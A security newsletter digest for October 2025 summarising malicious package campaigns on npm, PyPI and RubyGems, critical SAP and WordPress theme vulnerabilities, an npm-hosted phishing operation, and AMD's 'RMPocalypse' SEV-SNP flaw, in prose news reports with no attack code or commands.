Programmer’s Digest #155
10/08/2025-10/15/2025 npm, PyPI, and RubyGems Packages,Critical Vulnerabilities in NetWeaver, Hackers Exploit Auth Bypass in Service Finder WordPress Theme And More.
1. npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
Researchers found malicious packages on npm, PyPI and RubyGems that use Discord webhooks as a command-and-control channel to exfiltrate stolen data. Discord webhooks post to channels without authentication and are effectively write-only, so defenders can’t read previous posts from the URL. Examples include npm’s mysql-dumpdiscord (steals config/.env files), nodejs.discord (logs via webhook), PyPI packages malinssx/malicus/maliinn (trigger HTTP calls on pip install), and RubyGems’ sqlcommenter_rails (collects host files like /etc/passwd and sends them to a hard-coded webhook). By abusing free, fast webhooks and hiding in install-time hooks or build scripts, attackers can siphon .env files, API keys, credentials, and host details from developer machines and CI runners before runtime detection. The company also flagged 338 malicious npm packages tied to a North Korean “Contagious Interview” campaign that lures developers with fake job offers and booby-trapped repos, using typosquats to deliver stealers and backdoors like BeaverTail and InvisibleFerret.
2. SAP Patches Critical Vulnerabilities in NetWeaver, Print Service, SRM
SAP released 16 new and updated security notes in its October 2025 Patch Day, including three addressing critical vulnerabilities. The most severe, CVE-2025-42944 (CVSS 10.0), is an insecure deserialization flaw in NetWeaver AS Java. Originally patched in September, the new update adds JVM-wide filters (jdk.serialFilter) to block unsafe class deserialization. Another critical bug, CVE-2025-42937 (CVSS 9.8), is a directory traversal flaw in Print Service that could let unauthenticated attackers overwrite system files. SAP also fixed CVE-2025-42910 (CVSS 9.0), an unrestricted file upload vulnerability in Supplier Relationship Management (SRM) that may allow malware uploads. Two high-severity flaws were addressed in Commerce Cloud (DoS bug, CVE-2025-5115) and Data Hub Integration Suite (misconfiguration flaw, CVE-2025-48913). Ten additional notes fix medium- and low-severity issues across NetWeaver, S/4HANA, and other platforms. No active exploitation has been reported, but SAP urges prompt patching due to known targeting of its software.
3. Hackers Exploit Auth Bypass in Service Finder WordPress Theme
Hackers are actively exploiting a critical flaw (CVE-2025-5947, CVSS 9.8) in the Service Finder WordPress theme that lets them bypass authentication and log in as administrators. The bug, caused by improper validation of the original_user_id cookie in the service_finder_switch_back() function, affects versions 6.0 and earlier. With admin access, attackers can fully control a WordPress site, create accounts, upload PHP files, and export databases. Security firm Wordfence has recorded over 13,800 exploit attempts since August 1, with attack spikes exceeding 1,500 daily in late September. The flaw was discovered by researcher “Foxyyy” and patched by developer Aonetheme in version 6.1, released July 17. Most attacks come from five IPs, though new ones may appear. Administrators should review logs for suspicious activity or new accounts, block the listed IPs, and update immediately, as attackers can erase traces of compromise once they gain admin access.
4. 175 Malicious npm Packages with 26,000 Downloads Used in Credential Phishing Campaign
Researchers flagged 175 malicious npm packages (26,000 downloads) used in a phishing campaign dubbed Beamglea, targeting 135+ industrial, tech, and energy firms. The packages act as hosting for redirect scripts served via npm’s registry and unpkg.com CDN rather than executing malware on install. A script named redirect_generator.py programmatically publishes packages like redirect-xxxxxx, injecting victim emails and phishing URLs. Each package provides an HTML file that loads beamglea.js from UNPKG; that JavaScript redirects victims to credential-harvesting pages while pre-filling the email field, boosting success rates. Socket found over 630 such HTML files masquerading as purchase orders, specs, or project docs. Distribution likely relies on phishing emails that prompt recipients to open the crafted HTML. Attackers leverage free, trusted infrastructure (npm + UNPKG) to build resilient, low-cost phishing infrastructure, avoiding detection by not performing malicious actions during package install. The campaign underscores how legitimate platforms can be abused as hosting for targeted credential theft.
5. RMPocalypse: Single 8-Byte Write Shatters AMD’s SEV-SNP Confidential Computing
Chipmaker AMD has released fixes for a security flaw named “RMPocalypse,” which undermines the confidentiality guarantees of its Secure Encrypted Virtualization (SEV-SNP) technology. According to ETH Zürich researchers, the attack exploits incomplete protections, allowing a single malicious write to the Reverse Map Paging (RMP) table—a critical structure storing security metadata for all DRAM pages. The vulnerability (CVE-2025-0033, CVSS score 5.9) is a race condition occurring during the initialization of the RMP by the AMD Secure Processor (ASP/PSP). This permits a malicious hypervisor to manipulate the RMP’s initial content, compromising the memory integrity of SEV-SNP protected virtual machines. A compromised RMP voids all SEV-SNP integrity and confidentiality guarantees, enabling attackers to bypass isolation, forge attestations, and exfiltrate all secrets with a 100% success rate.
Impacted products include multiple AMD EPYC™ 7003, 8004, 9004, and 9005 series processors. While fixes are available for many, some embedded series updates are planned for November 2025. Microsoft and Supermicro are also addressing the flaw in their respective platforms. This incident highlights a critical catch-22 where the security mechanism itself was not fully protected during VM startup.